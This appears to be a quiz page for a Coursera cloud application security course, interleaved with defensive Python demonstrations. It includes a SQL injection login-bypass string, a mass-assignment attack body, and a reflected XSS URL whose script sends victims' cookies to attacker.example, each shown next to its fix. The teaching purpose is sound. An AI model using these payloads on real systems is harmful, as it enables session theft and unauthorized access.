Cloud Application Security Coursera Quiz Answers


After completing the course, the student should be able to do the following:

● List and describe the OWASP Top 10 vulnerabilities.

● Identify methods to provide cloud security assurance as part of the development life cycle, e.g. in a continuous delivery environment.

● List and describe the different types of virtualization or sandboxing used to protect cloud applications at either the server or client.

● Describe the application of authentication factors and federated identity solutions in cloud client and server authentication.

● Given a cloud application, explain where and how the necessary crypto keys, passwords, and other security secrets should be stored and distributed.


Week 1: Application Security Risks

Quiz: Module 1

Q1. Letters, telegrams, and other messages can sit in a pile to await delivery. Is there a way to do that with a circuit-oriented phone system?

  • No, because there is no way to “save” a two-way telephone conversation.
  • Yes, if the phone being called has a way to record a message spoken by the caller
  • No, because telephone systems were analog and practical storage is digital.
  • Yes, the phone company attached analog recorders to all phone lines for saving messages

Q2. Which of the following were true about both the ARPANET and ALOHANET? Select all that apply.

  • Both transmitted data in digital packets
  • Both provided reliable packet delivery to the connected host computers
  • Both were designed to support message oriented transmission
  • Both used analog communications links between endpoints

Q3. Each entry in the National Vulnerability Database has a one-to-one relationship to entries in which of the following databases?

  • CVE
  • CWE
  • OWASP Top Ten
  • MITRE

Q4. How does an injection attack work in general? Pick the best explanation.

  • A user mistypes a text entry and causes a database to crash
  • An attacker uses a trial-and-error attack to find valid credentials to log in to a site. The attack uses a database of user IDs and passwords
  • An attacker sends specially designed text to a server, which the server assumes is a simple text parameter. The text passes through command interpreters that misinterpret its contents as commands
  • An attacker uses SQL command syntax to trick the login process. Instead of providing the correct password, the command syntax indicates that a guessed password is correct by using a logical expression
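The general mechanism in Q4 (client text passing through a command interpreter that treats it as syntax) and the specific login-bypass case in the last option are the same bug seen at two levels. The following is an added example, not code from the course or the quiz: a constructed in-memory SQLite table and two login functions, one that splices the client's text into the statement and one that passes it as a bound parameter. The user record and the `' OR '1'='1` payload are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table for the demonstration (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    # The client's text is spliced into the statement, so the SQL interpreter
    # sees the quote and the OR as syntax rather than as part of a value.
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(sql).fetchone()


def login_safe(conn, name, password):
    # Placeholders keep the client's text as data; the engine never parses it as SQL,
    # so the same payload simply fails to match any password.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR '1'='1"   # constructed attack string, no password known
    print("vulnerable:", login_vulnerable(conn, "alice", payload))
    print("safe:      ", login_safe(conn, "alice", payload))
```

The vulnerable query becomes `... AND password = '' OR '1'='1'`, which is true for every row, so the attacker is "logged in" as alice without the password; the parameterized version returns nothing.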

Q5. Which of the following are authentication problems, as opposed to session problems? Select all that apply.

  • Users receive emails claiming to be from the HR department, demanding that they log in and verify personal information. The login is bogus and steals their login credentials
  • Credential stuffing attack
  • A user visits a retail web site and finds the shopping cart already full, with name and address already filled out. The name and address do not belong to the user
  • A user logs in to a retail web site and puts items in the shopping cart. Somehow an attacker takes over the shopping cart, orders merchandise, and addresses the delivery elsewhere

Q6. Are failures to limit transaction rates the same as DDOS attacks, like flooding? Choose the best answer.

  • Yes, because both overwhelm the server with traffic it can’t possibly handle.
  • No, because the server can, by design, limit transaction rates and manage resources so that service is still provided.

Q7. Why do security configuration guidelines tell site administrators to disable, change, or restrict access to built-in user IDs wherever possible?

  • Popular built-in user IDs always appear in “credential stuffing” databases
  • It’s often necessary to provide a ‘back door’ login in a production system for debugging purposes, and such accounts should use hard-to-guess names
  • The administrator reduces the amount of system information visible to outsiders by changing the names

Q8. Which of the following are recognized types of XSS attacks? Select all that apply.

  • Stored XSS
  • Reflected XSS
  • Plugin XSS
  • Backdoor XSS

Q9. Which of the following could contain a significant deserialization risk? Select all that apply.

  • The server reads in an XML file stored with the server’s source code.
  • The server reads an XML file uploaded from the client.
  • Data is collected in a web form and saved directly into a JSON object that is sent to the server. The server reads the JSON into an object on the server.
  • The server creates JSON objects to associate user IDs with access rights to other objects. The JSON objects are saved in files on the server’s own, controlled storage area
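The risky cases in Q9 are the ones where the serialized data comes from the client. The following is an added example, not code from the course: it shows the "web form saved directly into a JSON object" case, where a server that maps every JSON key onto its own object lets the client set fields the form never exposed, and the allow-listed alternative that validates the whole body before touching the object. The `Profile` class, its fields and the attack body are constructed for the demonstration.

```python
import json


class Profile:
    """Server-side object that the request body is deserialized into (constructed)."""

    def __init__(self, user_id):
        self.user_id = user_id
        self.display_name = ""
        self.is_admin = False


def update_profile_unsafe(profile, body):
    # Every key in the client's JSON becomes an attribute of the server object,
    # including ones the form never offered. The client now controls is_admin.
    profile.__dict__.update(json.loads(body))
    return profile


# Allow-list of fields a client may write, with the type each must have.
CLIENT_WRITABLE = {"display_name": str}


def update_profile_safe(profile, body):
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("body must be a JSON object")
    # Validate everything first so a bad body changes nothing at all.
    for key, value in data.items():
        expected = CLIENT_WRITABLE.get(key)
        if expected is None:
            raise ValueError(f"field not writable by client: {key}")
        if not isinstance(value, expected):
            raise ValueError(f"wrong type for {key}")
    for key, value in data.items():
        setattr(profile, key, value)
    return profile


# Constructed attack body: the form only had a display-name field, but the
# attacker edits the request in transit and adds two more keys.
ATTACK_BODY = '{"display_name": "Mallory", "is_admin": true, "user_id": 1}'

if __name__ == "__main__":
    print(vars(update_profile_unsafe(Profile(7), ATTACK_BODY)))
    try:
        update_profile_safe(Profile(7), ATTACK_BODY)
    except ValueError as e:
        print("rejected:", e)
```

The same reasoning applies to the uploaded XML case: the parser must be configured for untrusted input (no external entity resolution) and the result mapped through an allow-list, not straight into server objects.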

Q10. In 2017, major software flaws were reported and patched in two major software components: Apache Struts and Windows SMB. Which of the following are true about these patches?

  • A large series of attacks took place before the patches were released.
  • A large series of attacks took place within days of releasing the Apache Struts patch.
  • A large series of attacks took place within months of releasing the Apache Struts patch.
  • A large series of attacks took place within days of releasing the Windows SMB patch.
  • A large series of attacks took place within months of releasing the Windows SMB patch.

Week 2: Architecture and Authentication

Quiz: Module 2

Q1. Which of the following are kept secret to ensure accurate authentication? Select all that apply.

  • Authentication secret
  • Credential
  • Factor
  • User ID

Q2. What is the difference between a credential and an authentication secret?

  • An authentication secret is used in one authentication operation while the credential is used over a long period of time.
  • A credential is a physical badge while an authentication secret is computer data.
  • A credential is used in one authentication operation while the authentication secret is used over a long period of time.
  • There is no difference: both contain exactly the same data.

Q3. This is an old-style ATM cash card that did not contain a smart card chip. Which of the following best describes it in terms of authentication factors?

  • One weak factor: the card
  • Two weak factors: the card + a PIN
  • Three strong factors: the card + a PIN + the card’s owner
  • Two strong factors: the card + a PIN

Q4. Which of the following provide a strong one-time passcode mechanism? Select all that apply.

  • A smart phone with one-time passcode software.
  • The mag stripe on the back of a credit card.
  • A SecurID token
  • A smart phone using SMS to collect a one-time passcode.

Q5. A smart phone unlocks with either a passcode or a biometric reading. Once it’s unlocked, we can use its OTP software to log in to a web site. How many factors are involved to log in to the web site with the phone?

  • Two factors: something you have (the OTP software) and either something you know (the PIN) or something you are (the biometric).
  • Three factors: something you have (the OTP software), something you know (the PIN), and something you are (the biometric).
  • Two factors: something you know (the PIN) and something you are (the biometric)
  • One factor: either something you know (the PIN) or something you are (the biometric)

Q6. We are using a low-entropy passcode to authenticate a handheld device. What can we do to increase its security strength? Select all that apply.

  • Limit the number of unsuccessful passcode guesses allowed
  • Make the passcode shorter
  • Reduce the false acceptance rate
  • Make the passcode longer

Q7. Are biometrics a good choice for remote authentication? Select the best answer.

  • Yes, because their credentials are hard to simulate across a network link.
  • Yes, because the corresponding human features are almost impossible for attackers to copy.
  • No, because biometric authentication either matches perfectly or not at all.
  • No, because they are especially vulnerable to replay attacks.

Q8. Why are authentication devices like one-time password tokens and compatible smartphone-based methods considered stronger than other techniques?

  • The devices carry an extremely large authentication secret that defies attempts at trial-and-error guessing.
  • One-time password mechanisms are themselves immune to trial-and-error attacks.
  • Physical devices always provide a stronger authentication mechanism.

Q9. How does the software architecture REST address security?

  • The architecture assumes that the modeled services are protected by security measures wrapped around the services.
  • Security is enforced through the CRUD API definitions.
  • Sessions are explicitly represented in the architectural model
  • Generic data states, like those described in Course 2, are made part of the architectural model.

Q10. Service security relies on which of the following features? Select all that apply.

  • Authenticated sessions
  • Client authentication with SSL/TLS
  • Statelessness
  • Server authentication with SSL/TLS

Week 3: Session Management

Quiz: Module 3

Q1. This session ID is not tied to a particular user ID. Which of the following terms best describes it?

  • Permissive
  • Strict
  • Anonymous
  • Authenticated

Q2. This session ID was provided by the user to the server. Which of the following terms best describes it?

  • Permissive
  • Strict
  • Anonymous
  • Authenticated

Q3. If the session management software renews a session, which of the following are true? Select all that apply.

  • The session always receives a new session ID.
  • The session is always re-authenticated
  • Session communications are encrypted using SSL/TLS
  • The new session ID is derived from the previous session ID

Q4. Which of the following are preferred for sharing session IDs?

  • URL parameters
  • URL arguments
  • HTTP Cookies
  • Proprietary HTTP headers

Q5. Which of the following attributes prevent a session ID from being shared with other sites? Select all that apply.

  • HTTPOnly
  • Secure
  • Domain
  • Path
  • SameSite

Q6. Which of the following situations make a cookie persistent? Select all that apply.

  • Expire attribute
  • Max-Age attribute
  • When the browser exits
  • SameSite attribute

Q7. What is a session fixation attack?

  • The attacker provides the session ID used by the client, and the server accepts permissive session IDs
  • The attacker guesses or intercepts the session ID established by the server
  • The attacker retrieves the session ID using cross-site scripting
  • The attacker changes the Max-Age attribute to an extremely high value

Q8. The users of the application under development are likely to use the application more-or-less continuously during their office hours. The principal risk is sidejacking. Individual computers and mobile devices are locked when idle. Which of the following is the best strategy for handling session expiration?

  • Make the absolute expiration time as high as possible
  • Renew sessions periodically
  • Never expire sessions during office hours
  • Disable timeouts on the client host

Q9. Which of the following methods are recommended for preserving session ID security? Select all that apply.

  • Protect all transmissions containing the session ID with SSL/TLS
  • Use a cryptographically secure random number generator when generating the session ID.
  • The session ID should be no more than 64 bits long.
  • The session ID should contain the user’s ID to protect against hijacking

Q10. Which of the following mechanisms ensure the encryption of the Session ID? Select all that apply.

  • Secure attribute
  • HTTPOnly attribute
  • HSTS
  • Don’t mix HTTP and HTTPS on a page, but allow all-HTTP pages
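The Module 3 questions (strict versus permissive IDs, anonymous versus authenticated sessions, renewal on login, fixation, CSPRNG generation, and the cookie attributes in Q4 to Q6 and Q10) describe one design. The following is an added example, not code from the course, that puts those pieces together in a small server-side session store and the Set-Cookie line it emits. The `SessionStore` class, the cookie name `sid` and the attacker-chosen value are assumptions of this example; the ID generator and cookie builder are standard-library calls.

```python
import secrets
from http.cookies import SimpleCookie

SESSION_ID_BYTES = 32   # 256 bits from the OS CSPRNG, well beyond the 64-bit option in Q9
REQUIRED_ATTRS = ("Secure", "HttpOnly", "SameSite")


class SessionStore:
    """Strict session handling: the server only honours IDs it generated itself."""

    def __init__(self):
        self._sessions = {}   # session id -> user id, or None while anonymous

    def _issue(self, user=None):
        sid = secrets.token_urlsafe(SESSION_ID_BYTES)
        self._sessions[sid] = user
        return sid

    def resolve(self, presented):
        """Map the ID from the request cookie to a session the server created.
        A permissive server would adopt any presented value, which is what lets an
        attacker fix the ID in advance; unknown values get a fresh anonymous session."""
        if presented in self._sessions:
            return presented
        return self._issue()

    def user_of(self, sid):
        return self._sessions.get(sid)

    def login(self, sid, user):
        """Authenticate and renew: the pre-login ID is retired, so an ID the attacker
        already knew (by fixation or sidejacking) never becomes an authenticated one."""
        self._sessions.pop(sid, None)
        return self._issue(user)

    def logout(self, sid):
        self._sessions.pop(sid, None)


def session_cookie(sid, max_age=None):
    """Set-Cookie value for the ID. Without Max-Age or Expires the cookie is
    non-persistent and dies when the browser exits."""
    c = SimpleCookie()
    c["sid"] = sid
    c["sid"]["secure"] = True        # only sent over TLS
    c["sid"]["httponly"] = True      # not readable by page scripts
    c["sid"]["samesite"] = "Strict"  # not sent on cross-site requests
    c["sid"]["path"] = "/"
    if max_age is not None:
        c["sid"]["max-age"] = max_age
    return c.output(header="").strip()


def audit_cookie(header):
    """Return (missing hardening attributes, is_persistent) for a Set-Cookie value."""
    attrs = {part.strip().split("=", 1)[0].lower() for part in header.split(";")[1:]}
    missing = [a for a in REQUIRED_ATTRS if a.lower() not in attrs]
    persistent = bool({"max-age", "expires"} & attrs)
    return missing, persistent


if __name__ == "__main__":
    store = SessionStore()
    sid = store.resolve("value-the-attacker-chose")   # constructed fixation attempt
    auth = store.login(sid, "alice")
    print(session_cookie(auth))
    print(audit_cookie("sid=abc; Path=/"))
```

Note that `Secure` and `HSTS` keep the cookie off plain HTTP, while `HttpOnly` and `SameSite` limit who can read or send it; none of them substitutes for renewing the ID at login.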

Week 4: Providers, Crypto, and Scripts

Quiz: Module 4

Q1. The video on trusting cloud providers suggests four roles for onsite personnel. Given those suggestions, which of the following tasks are performed by system administrators? Select all that apply.

  • Review security logs and alerts
  • Install or replace software
  • Install or replace hardware
  • Control physical access by other personnel

Q2. The video on trusting cloud providers suggests four roles for onsite personnel. Given those suggestions, which of the following tasks are performed by system operators and monitors? Select all that apply.

  • Install or replace software
  • Control physical access by other personnel
  • Manage network and server operations
  • Review security logs and alerts

Q3. A potential cloud consumer wants to review a cloud provider’s security measures. Which of the following provides the consumer with the most relevant details?

  • SOC 3 report
  • SOC 1 report
  • Security logs
  • SOC 2 report

Q4. Which of the following help a cloud provider ensure “Trust, but verify” onsite? Select all that apply.

  • Separation of duties
  • Protected event logging
  • SOC 3 report
  • Redundant network firewalls

Q5. Which of the following is a crypto key used to encrypt other crypto keys?

  • DEK
  • KMS
  • KEK
  • HSM

Q6. Is there a difference between key encapsulation and key wrapping? Select the best answer below.

  • Yes: encapsulation requires an HSM while wrapping can be performed in RAM.
  • Yes, encapsulation uses a secret key while wrapping uses a public key.
  • Yes: encapsulation uses a public key while wrapping uses a secret key.
  • No, both encrypt a crypto key to make it safe for storage and distribution.

Q7. NIST recommends changing a crypto key periodically if it encrypts a lot of data. What is the maximum recommended “age” for such a key?

  • 6 months
  • 2 years
  • 5 years
  • 1 year
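Q5 to Q7 describe the KEK/DEK split and why the two kinds of key age differently. The following is an added example, not code from the course: envelope encryption with one DEK per object, a `Kms` object that holds the KEK versions and only ever hands out wrapped DEKs, and a re-wrap step after KEK rotation that leaves the bulk ciphertext untouched. To keep it standard-library only, the cipher is an HMAC-SHA256 counter-mode stream with an encrypt-then-MAC tag, a stand-in for AES-GCM and AES key wrap; that substitution, the `Kms` class and the sample record are assumptions of this example, and symmetric wrapping (not public-key encapsulation) is what is shown.

```python
import hashlib
import hmac
import os
import struct


def _keystream(key, nonce, length):
    """HMAC-SHA256 in counter mode: a stand-in for AES so the example runs with
    only the standard library. Production code would use AES-GCM / AES-KW."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + struct.pack(">Q", counter), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def _subkeys(key):
    return (hmac.new(key, b"enc", hashlib.sha256).digest(),
            hmac.new(key, b"mac", hashlib.sha256).digest())


def seal(key, plaintext, aad=b""):
    """Encrypt-then-MAC. Output layout: nonce(16) || ciphertext || tag(32)."""
    enc_key, mac_key = _subkeys(key)
    nonce = os.urandom(16)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, aad + nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def unseal(key, blob, aad=b""):
    enc_key, mac_key = _subkeys(key)
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(mac_key, aad + nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: ciphertext or wrapped key was altered")
    return bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, nonce, len(ct))))


class Kms:
    """Models the key management service: holds every KEK version and returns
    only wrapped DEKs. KEK bytes never leave this object."""

    def __init__(self):
        self._keks = {}
        self.current = 0
        self.rotate_kek()

    def rotate_kek(self):
        """New KEK version; old versions stay so existing envelopes still unwrap."""
        self.current += 1
        self._keks[self.current] = os.urandom(32)
        return self.current

    def wrap(self, dek):
        return self.current, seal(self._keks[self.current], dek, aad=b"dek-wrap")

    def unwrap(self, version, wrapped):
        return unseal(self._keks[version], wrapped, aad=b"dek-wrap")


def encrypt_object(kms, plaintext):
    """Envelope encryption: a fresh DEK per object, stored only in wrapped form."""
    dek = os.urandom(32)
    version, wrapped = kms.wrap(dek)
    return {"kek_version": version, "wrapped_dek": wrapped, "ciphertext": seal(dek, plaintext)}


def decrypt_object(kms, envelope):
    dek = kms.unwrap(envelope["kek_version"], envelope["wrapped_dek"])
    return unseal(dek, envelope["ciphertext"])


def rewrap(kms, envelope):
    """After a KEK rotation, re-wrap the DEK under the current KEK. The bulk
    ciphertext is untouched; only replacing the DEK itself, when its own
    cryptoperiod is up, requires re-encrypting the data."""
    dek = kms.unwrap(envelope["kek_version"], envelope["wrapped_dek"])
    version, wrapped = kms.wrap(dek)
    return {**envelope, "kek_version": version, "wrapped_dek": wrapped}


if __name__ == "__main__":
    kms = Kms()
    env = encrypt_object(kms, b"customer record (constructed sample)")
    kms.rotate_kek()
    env = rewrap(kms, env)
    print(env["kek_version"], decrypt_object(kms, env))
```

The practical point for Q7: a KEK encrypts only small wrapped keys, so rotating it is cheap and frequent; a DEK encrypts the bulk data, so its age limit is what forces a real re-encryption job.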

Q8. Which of the following are true of reflected, server-side XSS attacks? Select all that apply.

  • The attack is delivered through a URL containing the malicious script
  • The server executes the attack script
  • The attacker stores the attack script on the server
  • The client executes the attack script
  • The attack uses a malicious script stored on an unsuspecting server host

Q9. What server error is primarily responsible for XSS attacks? Choose the best response.

  • The server fails to authenticate users before accepting text in critical server functions.
  • The server fails to validate text provided by the user before using it in an interpreted command or programming language statement.
  • The server allows non-ASCII characters to be used in web or API service arguments.

Q10. Which of the following performs the “reflection” in an XSS reflection attack. Select the best response.

  • The targeted client
  • The targeted server
  • The attacker’s host computer
  • The host containing the URL the client clicks on.

Q11. In the course video illustrating reflected XSS, the attacker wants to collect session IDs of legitimate logged-in users, and purchase merchandise using the users’ credentials. If a user clicks on the attack URL without logging in first, what is most likely to happen? Select the best answer.

  • The server rejects the attempt to use the search function.
  • The server reflects the script, it executes on the client, and forwards the victim’s logged-in session ID to the attacker
  • The server reflects the script, it executes on the client, and forwards a useless session ID to the attacker
  • The server reflects the script, it executes on the client, and fails because there is no session ID
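Q8 to Q11 all hinge on the same division of labour: the server reflects the text from the URL into the page, the victim's browser executes it. The following is an added example, not code from the course video: a search handler that reflects the `q` parameter verbatim beside one that escapes it at the point of output, driven by a constructed attack URL of the kind the questions describe. The site name `shop.example`, the attacker host `attacker.example` and the page template are placeholders of this example.

```python
import html
from urllib.parse import parse_qs, urlsplit


def search_page_vulnerable(query):
    # The parameter is reflected into the HTML verbatim, so the browser parses
    # the attacker's <script> element as markup and runs it in the victim's origin.
    return f"<h1>Results for {query}</h1>"


def search_page_safe(query):
    # Escape at the point of output: the text is displayed, not interpreted.
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def handle_request(url, render):
    """Server side: pull q from the URL the victim clicked and render the page."""
    q = parse_qs(urlsplit(url).query).get("q", [""])[0]
    return render(q)


def contains_script(page):
    return "<script" in page.lower()


# Constructed attack URL: the script sends document.cookie to the attacker's host.
# It only yields a useful session ID if the victim is logged in and the cookie
# lacks HttpOnly; otherwise the attacker receives nothing worth having.
ATTACK_URL = ("https://shop.example/search?q=%3Cscript%3E"
              "new%20Image().src%3D%22https%3A%2F%2Fattacker.example%2Fc%3F%22%2Bdocument.cookie"
              "%3C%2Fscript%3E")

if __name__ == "__main__":
    print(handle_request(ATTACK_URL, search_page_vulnerable))
    print(handle_request(ATTACK_URL, search_page_safe))
```

Escaping on output is the fix for Q9's "server fails to validate text before using it in an interpreted language"; the HttpOnly attribute from Module 3 is the second layer that keeps a successful reflection from reading the session cookie.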

Conclusion:

I hope these Cloud Application Security Coursera Quiz Answers are useful and help you learn something new. If they helped you, don’t forget to bookmark our site for more Coding Solutions.


Keep Learning!
